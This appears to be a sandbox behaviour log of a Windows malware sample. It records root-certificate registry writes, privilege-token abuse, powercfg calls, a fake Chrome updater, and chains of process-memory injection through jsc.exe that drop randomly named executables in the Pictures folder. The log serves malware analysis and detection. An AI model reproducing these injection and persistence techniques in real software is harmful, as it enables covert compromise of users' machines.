C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\b8BD8mUZg1QzK4WHCOlyefC6.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Google\Chrome\updater.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4516 wrote to memory of 4892 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
PID 4516 wrote to memory of 4892 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
PID 4516 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 4516 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 4516 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 4516 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 4516 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 4516 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 4516 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 4516 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 1640 wrote to memory of 4752 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe
PID 1640 wrote to memory of 4752 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe
PID 1640 wrote to memory of 4752 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe
PID 1640 wrote to memory of 212 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe
PID 1640 wrote to memory of 212 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe
PID 1640 wrote to memory of 212 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe
PID 1640 wrote to memory of 3132 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\yfbdsjlje4JOSrr5jnDosrVb.exe
PID 1640 wrote to memory of 3132 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\yfbdsjlje4JOSrr5jnDosrVb.exe
PID 1640 wrote to memory of 3132 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\yfbdsjlje4JOSrr5jnDosrVb.exe
PID 1640 wrote to memory of 2396 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\b8BD8mUZg1QzK4WHCOlyefC6.exe
PID 1640 wrote to memory of 2396 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\b8BD8mUZg1QzK4WHCOlyefC6.exe
PID 1640 wrote to memory of 2396 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\b8BD8mUZg1QzK4WHCOlyefC6.exe
PID 1640 wrote to memory of 1236 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe
PID 1640 wrote to memory of 1236 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe
PID 1640 wrote to memory of 540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe
PID 1640 wrote to memory of 540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe
PID 1640 wrote to memory of 540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe
PID 1640 wrote to memory of 3032 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\kepPL1XOY5LSSrh2bfHa1ijC.exe
PID 1640 wrote to memory of 3032 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\kepPL1XOY5LSSrh2bfHa1ijC.exe
PID 1640 wrote to memory of 4332 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 1640 wrote to memory of 4332 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 1640 wrote to memory of 4332 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
PID 212 wrote to memory of 3044 N/A C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 212 wrote to memory of 3044 N/A C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 212 wrote to memory of 3044 N/A C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 1640 wrote to memory of 1908 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe
PID 1640 wrote to memory of 1908 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe
